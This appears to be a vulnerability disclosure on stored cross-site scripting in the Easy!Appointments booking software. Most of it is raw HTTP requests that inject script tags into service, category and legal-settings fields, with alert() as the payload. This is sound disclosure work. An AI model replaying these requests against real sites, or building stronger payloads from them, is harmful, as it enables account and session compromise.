Description

Stored XSS on create/update service, categories, settings. I was test on 1.4.3 (demo site) and 1.5.0-dev2

Proof of Concept

Install
I install from develope branch. When finish install footer display version v1.5.0-dev.2
The time I run and commit below on image is the latest

webUI


alert on demo site: Version 1.4.3


Reproduce on Local
Request:

POST /easyappointments/index.php/services/update HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 482
Origin: http://localhost
Connection: close
Referer: http://localhost/easyappointments/index.php/services
Cookie: csrfCookie=3507348b3bb298f75c607b27d855dad1; ea_session=u4ub9lhann4css234pgt235217t2gfqb; csrf_cookie=1ad54974bc783c6d6831ad34a3b1ceb3
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

csrf_token=1ad54974bc783c6d6831ad34a3b1ceb3&service%5Bname%5D=Service%22%3E%3Cscript%3Ealert(String.fromCharCode(88%2C83%2C83))%3C%2Fscript%3E&service%5Bduration%5D=30&service%5Bprice%5D=0&service%5Bcurrency%5D=&service%5Bdescription%5D=1%22%3E%3Cscript%3Ealert(String.fromCharCode(88%2C83%2C83))%3C%2Fscript%3E&service%5Blocation%5D=&service%5Bcolor%5D=%23ebe07c&service%5Bavailabilities_type%5D=flexible&service%5Battendants_number%5D=1&service%5Bis_private%5D=0&service%5Bid%5D=1

Response:

{"success":true,"id":1}

Request:

POST /easyappointments/index.php/services/create HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 448
Origin: http://localhost
Connection: close
Referer: http://localhost/easyappointments/index.php/services
Cookie: csrfCookie=3507348b3bb298f75c607b27d855dad1; ea_session=u4ub9lhann4css234pgt235217t2gfqb; csrf_cookie=1ad54974bc783c6d6831ad34a3b1ceb3
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

csrf_token=1ad54974bc783c6d6831ad34a3b1ceb3&service%5Bname%5D=S2%22%3E%3Cscript%3Ealert(String.fromCharCode(88))%3C%2Fscript%3E&service%5Bduration%5D=30&service%5Bprice%5D=0&service%5Bcurrency%5D=&service%5Bdescription%5D=%22%3E%3Cscript%3Ealert(String.fromCharCode(88%2C83%2C83))%3C%2Fscript%3E&service%5Blocation%5D=&service%5Bcolor%5D=%237cbae8&service%5Bavailabilities_type%5D=flexible&service%5Battendants_number%5D=1&service%5Bis_private%5D=0

Response:

{"success":true,"id":3}

Request

POST /easyappointments/index.php/categories/create HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 214
Origin: http://localhost
Connection: close
Referer: http://localhost/easyappointments/index.php/categories
Cookie: csrfCookie=3507348b3bb298f75c607b27d855dad1; ea_session=nfn5oc2bm60pr5lkaede42b97rgiag83; csrf_cookie=1ad54974bc783c6d6831ad34a3b1ceb3
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

csrf_token=1ad54974bc783c6d6831ad34a3b1ceb3&category%5Bname%5D=categories%22%3E%3Cscript%3Ealert('categories')%3C%2Fscript%3E&category%5Bdescription%5D=categories%22%3E%3Cscript%3Ealert('categories')%3C%2Fscript%3E

Response

{"success":true,"id":3}

Request

POST /easyappointments/index.php/categories/update HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 235
Origin: http://localhost
Connection: close
Referer: http://localhost/easyappointments/index.php/categories
Cookie: csrfCookie=3507348b3bb298f75c607b27d855dad1; ea_session=nfn5oc2bm60pr5lkaede42b97rgiag83; csrf_cookie=1ad54974bc783c6d6831ad34a3b1ceb3
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

csrf_token=1ad54974bc783c6d6831ad34a3b1ceb3&category%5Bname%5D=categories%22%3E%3Cscript%3Ealert('categories2')%3C%2Fscript%3E&category%5Bdescription%5D=categories%22%3E%3Cscript%3Ealert('categories2')%3C%2Fscript%3E&category%5Bid%5D=2

Ressponse

{"success":true,"id":2}

Request

POST /easyappointments/index.php/legal_settings/save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 711
Origin: http://localhost
Connection: close
Referer: http://localhost/easyappointments/index.php/legal_settings
Cookie: csrfCookie=3507348b3bb298f75c607b27d855dad1; ea_session=96k2nk94s2cihcbevlmanv2mf76c84mk; csrf_cookie=1ad54974bc783c6d6831ad34a3b1ceb3
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

csrf_token=1ad54974bc783c6d6831ad34a3b1ceb3&legal_settings%5B0%5D%5Bname%5D=display_cookie_notice&legal_settings%5B0%5D%5Bvalue%5D=0&legal_settings%5B1%5D%5Bname%5D=cookie_notice_content&legal_settings%5B1%5D%5Bvalue%5D=1%22%3E%3Cscript%3Ealert('abc')%3C%2Fscript%3E&legal_settings%5B2%5D%5Bname%5D=display_terms_and_conditions&legal_settings%5B2%5D%5Bvalue%5D=0&legal_settings%5B3%5D%5Bname%5D=terms_and_conditions_content&legal_settings%5B3%5D%5Bvalue%5D=Terms+and+conditions+content.&legal_settings%5B4%5D%5Bname%5D=display_privacy_policy&legal_settings%5B4%5D%5Bvalue%5D=1&legal_settings%5B5%5D%5Bname%5D=privacy_policy_content&legal_settings%5B5%5D%5Bvalue%5D=1%22%3E%3Cscript%3Ealert('abc')%3C%2Fscript%3E

Alert
open bookng link or index to view alert








Alert with setting